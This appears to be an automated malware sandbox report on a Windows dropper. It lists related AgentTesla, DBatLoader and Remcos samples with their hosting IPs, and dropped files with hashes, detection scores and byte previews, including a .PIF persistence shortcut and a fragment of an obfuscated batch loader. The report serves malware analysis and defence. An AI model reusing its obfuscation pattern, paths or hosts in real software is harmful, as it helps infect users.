                                                                                          TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          NEOMS_EOI_FORM.GZGet hashmaliciousDBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          pywolwnvd.bizPO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                          • 54.244.188.177
                                                                                          IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 54.244.188.177
                                                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 54.244.188.177
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 54.244.188.177
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 54.244.188.177
                                                                                          x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 54.244.188.177
                                                                                          TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 54.244.188.177
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 54.244.188.177
                                                                                          AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                          • 54.244.188.177
                                                                                          E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                          • 54.244.188.177
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          HAWKHOSTCAPayroll List.exeGet hashmaliciousFormBookBrowse
                                                                                          • 198.252.98.54
                                                                                          RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 198.252.105.91
                                                                                          MV KODCO.exeGet hashmaliciousFormBookBrowse
                                                                                          • 198.252.98.54
                                                                                          Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 198.252.105.91
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                          • 198.252.105.91
                                                                                          Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                          • 198.252.98.54
                                                                                          PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                                          • 198.252.98.54
                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                          • 172.64.41.3
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 172.67.187.240
                                                                                          Packing List - SAPPHIRE X.xlsx.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 172.67.74.152
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 104.21.7.169
                                                                                          Finish_Agreement_DocuSign.pdfGet hashmaliciousUnknownBrowse
                                                                                          • 104.18.95.41
                                                                                          http://www.btc1yby.blogspot.rs/Get hashmaliciousGRQ ScamBrowse
                                                                                          • 172.67.12.83
                                                                                          WOOYANG VENUS PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 172.67.74.152
                                                                                          file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 172.64.41.3
                                                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                          • 104.21.7.169
                                                                                          kkEzK284oT.exeGet hashmaliciousHTMLPhisherBrowse
                                                                                          • 104.18.11.207
                                                                                          OVHFRla.bot.mipsel.elfGet hashmaliciousUnknownBrowse
                                                                                          • 51.38.171.30
                                                                                          loligang.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                          • 192.99.154.40
                                                                                          http://www.kalenderpedia.deGet hashmaliciousUnknownBrowse
                                                                                          • 217.182.178.234
                                                                                          apep.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                          • 192.99.178.29
                                                                                          file.exeGet hashmaliciousXmrigBrowse
                                                                                          • 51.195.43.17
                                                                                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 46.105.79.108
                                                                                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 54.38.112.39
                                                                                          mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 137.74.55.109
                                                                                          x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          • 54.39.233.41
                                                                                          6xQ8CMUaES.exeGet hashmaliciousXmrigBrowse
                                                                                          • 51.89.23.91
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          3b5074b1b5d032e5620f69f9f700ff0ePacking List - SAPPHIRE X.xlsx.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 104.26.13.205
                                                                                          WOOYANG VENUS PARTICULARS.pdf.scr.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 104.26.13.205
                                                                                          5QnwxSJVyX.docGet hashmaliciousUnknownBrowse
                                                                                          • 104.26.13.205
                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                          • 104.26.13.205
                                                                                          file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                          • 104.26.13.205
                                                                                          file.exeGet hashmaliciousFormBookBrowse
                                                                                          • 104.26.13.205
                                                                                          file.exeGet hashmaliciousFormBookBrowse
                                                                                          • 104.26.13.205
                                                                                          Orden de compra HO-PO-376-25.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                                                                                          • 104.26.13.205
                                                                                          file.exeGet hashmaliciousCryptbotBrowse
                                                                                          • 104.26.13.205
                                                                                          INV-0542.pdf.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                          • 104.26.13.205
                                                                                          a0e9f5d64349fb13191bc781f81f42e19oKqST-uPDy7iigkXM-C5J2.emlGet hashmaliciousUnknownBrowse
                                                                                          • 198.252.105.91
                                                                                          1m181Ru74o.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          jlPBMMQbXC.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                          • 198.252.105.91
                                                                                          qqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                          • 198.252.105.91
                                                                                          nft438A5fN.exeGet hashmaliciousDBatLoader, RemcosBrowse
                                                                                          • 198.252.105.91
                                                                                          6BE4RDldhw.exeGet hashmaliciousDBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          AnyDesk.exeGet hashmaliciousDBatLoaderBrowse
                                                                                          • 198.252.105.91
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 198.252.105.91
                                                                                          file.exeGet hashmaliciousUnknownBrowse
                                                                                          • 198.252.105.91
                                                                                          file.exeGet hashmaliciousPureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                          • 198.252.105.91
                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                          C:\Users\Public\Libraries\lxsyrsiW.pifqqig1mHX8U.exeGet hashmaliciousAveMaria, DBatLoader, UACMeBrowse
                                                                                            RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                              IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                  Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                    Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                      x.exeGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                        TC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                          Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                            NEOMS_EOI_FORM.cmdGet hashmaliciousDBatLoaderBrowse
                                                                                                              C:\Users\Public\Libraries\Wisrysxl.PIFRFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1290240
                                                                                                                Entropy (8bit):5.277745813679996
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12288:mImGUcsvZZdubv7hfl3xXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlhsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                MD5:A8D3435B3F877F2BB99655D1A44B3190
                                                                                                                SHA1:F325D96F0B41E1B34BC6BA13CB7100F6BA5D4BE1
                                                                                                                SHA-256:7DF347C1C12A1E743FE8EB7AB9B175968C30D08A1602F3EAFF79CC09B40BBA5E
                                                                                                                SHA-512:0C1B18A17F66E07039F0B203A74C25F17651A69B8C689654CCB5C0FA2DE043EC20C803694EC4C10738750F134071634F205614AF36AF01414D3B1AB2AD3659A8
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\2jbMIxCFsK.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):4
                                                                                                                Entropy (8bit):2.0
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:rv:7
                                                                                                                MD5:9FBAF1370E81FDE19A18A160FC15ECF9
                                                                                                                SHA1:B0BC63263E276CE846F436531B7A2E2AF3EEF53F
                                                                                                                SHA-256:3C0A9FF56BD9A95864731AB94CCCCE154E70FCB82FFE8988AE93DAABEE635AD9
                                                                                                                SHA-512:9BD1495821C1213F92BC28974355572FA5CE36CC2C2BDB6B0C8A6291D54197A979E2878046792861538F7E3EC5FFBC8E4B76BC23AC8D18C0151265A4EA49DD8C
                                                                                                                Malicious:false
                                                                                                                Preview:27..
                                                                                                                Process:C:\Users\user\Desktop\2jbMIxCFsK.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1921890
                                                                                                                Entropy (8bit):7.398856770638502
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
                                                                                                                MD5:34E82F30B12F324DB1D2604CFA91CBB2
                                                                                                                SHA1:20001D49CD86B776EE8072A07F536B7330A77F97
                                                                                                                SHA-256:F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
                                                                                                                SHA-512:47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
                                                                                                                Malicious:true
                                                                                                                Preview:...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):1392640
                                                                                                                Entropy (8bit):7.401846851033825
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:24576:in5YMTKJPtU65L4oU78G6Hd8b2s17EeL4fFyV2vkSotd/ADgKczxj5z:wzGSkfQJSgK
                                                                                                                MD5:67DAC6AE9EE770115DB85CC71979DC41
                                                                                                                SHA1:A708539EBB312329F56F064A8491E4C6E1BD7CE8
                                                                                                                SHA-256:054899796D592BB5F70B0A9FA28429024A919270A76603626BE24068FAAE59D9
                                                                                                                SHA-512:9FF88C70D4A2F7628A2F853D576B8E7D7EBF3409DE13D56895A06EB2FDC827BEEF45EC982DBC69A9577ED78D27D44F5DF2284CDF614BA4DEBADAF74CD07C204D
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................f...........x............@..............................................@...............................'...P...........................r..................................................h...<............................text....Z.......\.................. ..`.itext..L....p.......`.............. ..`.data...............j..............@....bss.....6...@....... ...................idata...'.......(... ..............@....tls....4............H...................rdata...............H..............@..@.reloc...r.......t...J..............@..B.rsrc........P......................@..@.....................@..............@..@................................................................................................
                                                                                                                Process:C:\Users\user\Desktop\2jbMIxCFsK.exe
                                                                                                                File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):62357
                                                                                                                Entropy (8bit):4.705712327109906
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                Malicious:false
                                                                                                                Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                                Process:C:\Users\user\Desktop\2jbMIxCFsK.exe
                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):68096
                                                                                                                Entropy (8bit):6.328046551801531
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                Malicious:true
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                Joe Sandbox View:
                                                                                                                • Filename: qqig1mHX8U.exe, Detection: malicious, Browse
                                                                                                                • Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
                                                                                                                • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                                                                • Filename: x.exe, Detection: malicious, Browse
                                                                                                                • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                                                                • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious, Browse
                                                                                                                • Filename: NEOMS_EOI_FORM.cmd, Detection: malicious, Browse
                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
                                                                                                                Process:C:\Users\user\Desktop\2jbMIxCFsK.exe
                                                                                                                File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):104
                                                                                                                Entropy (8bit):5.094576921115185
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxwIKIAXv:HRYFVmTWDyzPtZExm9Xv
                                                                                                                MD5:872B7C81F3F3386DD4B548A0A47317B1
                                                                                                                SHA1:DECF92F684540FA8E0ED6AB511103D60B76381C5
                                                                                                                SHA-256:A532CF98C96AE348B516E9B983C7103D8E62628330236692C83AC91A68C35767
                                                                                                                SHA-512:8ABF0C52D7F6BEE4F9B56AEBDC42C4F6CF04BA4AC2BB882F6C51EF200DA1E441DCD7EE9FA6830FC8932A78A9C25C91CC040204B2A7A000BBD2E792748B499A37
                                                                                                                Malicious:true
                                                                                                                Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=948034..HotKey=10..
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):236544
                                                                                                                Entropy (8bit):6.4416694948877025
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                Category:dropped
                                                                                                                Size (bytes):18944
                                                                                                                Entropy (8bit):5.742964649637377
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                Malicious:false
                                                                                                                Antivirus:
                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................
                                                                                                                Process:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):410
                                                                                                                Entropy (8bit):5.361827289088002
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                Malicious:false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                Process:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):410
                                                                                                                Entropy (8bit):5.361827289088002
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAq1KDLI4M6:MLUE4K5E4KH1qE4j
                                                                                                                MD5:64A2247B3C640AB3571D192DF2079FCF
                                                                                                                SHA1:A17AFDABC1A16A20A733D1FDC5DA116657AAB561
                                                                                                                SHA-256:87239BAD85A89EB90322C658DFD589B40229E57F05B181357FF834FCBABCB7E2
                                                                                                                SHA-512:CF71FE05075C7CAE036BD1B7192B8571C6F97A32209293B54FAEC79BAE0B6C3369946B277CE2E1F0BF455BF60FA0E8BB890E7E9AAE9137C79AB44C9C3D406D35
                                                                                                                Malicious:false
                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):2232
                                                                                                                Entropy (8bit):5.379460230152629
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:fLHyIFKL3IZ2KRH9Oug8s
                                                                                                                MD5:4DC84D28CF28EAE82806A5390E5721C8
                                                                                                                SHA1:66B6385EB104A782AD3737F2C302DEC0231ADEA2
                                                                                                                SHA-256:1B89BFB0F44C267035B5BC9B2A8692FF29440C0FEE71C636B377751DAF6911C0
                                                                                                                SHA-512:E8F45669D27975B41401419B8438E8F6219AF4D864C46B8E19DC5ECD50BD6CA589BDEEE600A73DDB27F8A8B4FF7318000641B6A59E0A5CDD7BE0C82D969A68DE
                                                                                                                Malicious:false
                                                                                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
